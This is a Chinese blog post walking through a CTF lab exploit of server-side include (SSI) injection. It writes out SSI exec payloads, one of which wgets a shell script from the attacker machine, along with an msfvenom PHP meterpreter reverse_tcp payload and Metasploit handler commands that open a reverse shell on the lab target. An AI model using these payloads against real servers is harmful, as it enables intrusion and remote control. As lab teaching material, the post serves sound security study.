CTF-12.web安全SSI注入

最新推荐文章于 2024-05-03 13:34:21 发布
最新推荐文章于 2024-05-03 13:34:21 发布
阅读量700 收藏 2
点赞数
分类专栏: ctf 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/126948444
版权

SSl注入攻击介绍

SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssI来执行系统命令,并返回对应的结果。

如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSl注入攻击。

实验环境
攻击机: kali 192.168.1.103
靶场机器: linux 192.168.1.106

信息探测

扫描主机服务信息以及服务版本
– nmap -sV靶场lP地址
在这里插入图片描述

快速扫描主机全部信息
–nmap -T4 一A -v 靶场lP地址

探测敏感信息

nikto -host http://靶场IP地址:端口
在这里插入图片描述
dirb http://靶场IP地址:端口
在这里插入图片描述

深入挖掘

分析nmap .nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;
在这里插入图片描述

使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;
在这里插入图片描述

漏洞利用ssi

根据提示来利用对应ssL注入漏洞

列举当前目录中的文件和目录<l-#exec cmd=“Is” -->

切换到指定目录

<!--#exec cmd="cd /root/dir">

下载shell脚本并重命名为shell.php

<!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" ->

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw >/root/Desktop/shell.php
在这里插入图片描述

启动监听

在这里插入图片描述

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

在这里插入图片描述
将生成的shell移动到apache的根目录下
在这里插入图片描述
在这里插入图片描述
可以在靶场上提交脚本
在这里插入图片描述

<!--#exec cmd="wget http://192.168.1.103/shell.py"-->

在这里插入图片描述
出现下面界面下载成功
在这里插入图片描述
给shell赋对应的权限。
在这里插入图片描述
在进行运行
在这里插入图片描述
点击提交之后网页会卡住,这时可以查看kali
在这里插入图片描述

执行操作

sysinfo查看系统信息
shell进入系统shell
在这里插入图片描述

优化终端python -c ‘import pty;pty.spawn( "/bin/bash”)’
在这里插入图片描述

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd / root/
ls
cat flag

writeup 测试文档总结文档

总结:

在ctf比赛中,对于ssi漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;

wow2ok
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SSI注入
Vinson的博客
09-29 197
ssi是为了赋予html静态页面动态的效果,通过ssi执行系统命令,返回对应结果 若在网站目录中发现.stm,.shtm,.shtml,且网站对ssi的输入没有做到严格过滤,很可能收到ssi注入攻击 攻击机192.168.1.108 靶机192.168.1.109 nikto -host ip + Multiple index files found: /index.php, /inde...
10 常见网站安全攻击手段及防御方法
2301_77157449的博客
05-15 1710
第一种情况是,如果能够获得关于即将到来的安全更新的信息,攻击者就可以在更新上线前分析出漏洞的位置。网络钓鱼攻击用到的标准工具就是电子邮件。Precise Security近期的一项研究表明,跨站脚本攻击大约占据了所有攻击的40%,是最为常见的一类网络攻击。作为用户,只要看看网站的URL是不是以HTTPS开头就能发现这一潜在风险了,因为HTTPS中的“S”指的就是数据是加密的,缺了“S”就是未加密。网络钓鱼是另一种没有直接针对网站的攻击方法,但我们不能将它排除在名单之外,因为网络钓鱼也会破坏你系统的完整性。
WEB安全基础入门—操作系统命令注入(shell 注入)_文件参数 shell 命令注入
最新发布
2401_84184567的博客
05-03 615
这个命令就算存在的命令注入漏洞,但是在用户web端不会有任何回显。但我们可以尝试以下方式进行测试漏洞是否存在。
每日学习Redis——拿捏Redis中的通用指令(键和数据库通用指令)_m_redis-&gt;del(keyresult); m_redis-&gt;del(keytask)
2401_84170623的博客
04-29 411
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!pics/618545628)**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、
BUUCTF web SQL注入
m0_55854679的博客
08-09 2743
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
CTF-web 第十三部分 命令注入
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
2022--CTF-Web.pdf
07-09
2022--CTF-Web
CTF-tools.zip
09-23
离线的CTF工具,包括隐写,逆向,各种多功能离线加密工具!!!会一直更新,可以加好友获取最新工具包
SQLi-CTF-master.zip
04-09
SQLi-CTF-master
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-RSA-tool-master.zip
01-19
针对CTF中CRYPTO的RSA工具
SSL-CCS注入漏洞分析与中间人攻击实现
08-23
SSL-CCS注入漏洞分析与中间人攻击实现。有不对的地方欢迎指正
Kali学习笔记
weixin_38226321的博客
06-02 576
渗透安全学习笔记
SSI注入漏洞
Hydra的博客
11-19 9311
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
【Spring】四种注入方法及其复杂类型注入
写写平时的技术与感想
12-22 2389
spring注入方式 属性注入(get注入) (非常常用) user实体类: car实体类: 属性注入(构造方法注入) (常用) 易知所写的构造方法要能完成分别对上面的三个构造方法进行注入注入的配置文件的书写: 属性注入(p名空间注入 )(不常用) xmlns:p="http://www.springframework.org/sch...
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
sql注入实例分析
weixin_30624825的博客
07-23 3417
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
一步一步开发SSL在线工具
hamdell的博客
04-23 1242
01     写这篇文章的时候,SSLeye的核心功能已经完成小部分,同时也衍生了几个子项目:      - SSL在线工具(已完结),网址:http://www.ssleye.com/,对称加密算法、非对称加密算法、证书相关工具以及SSL检测等。     - Let's Encrypt免费证书(未开始)     - SSL漏洞在线检测工具(已完结),网址:http://scan.ssley...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值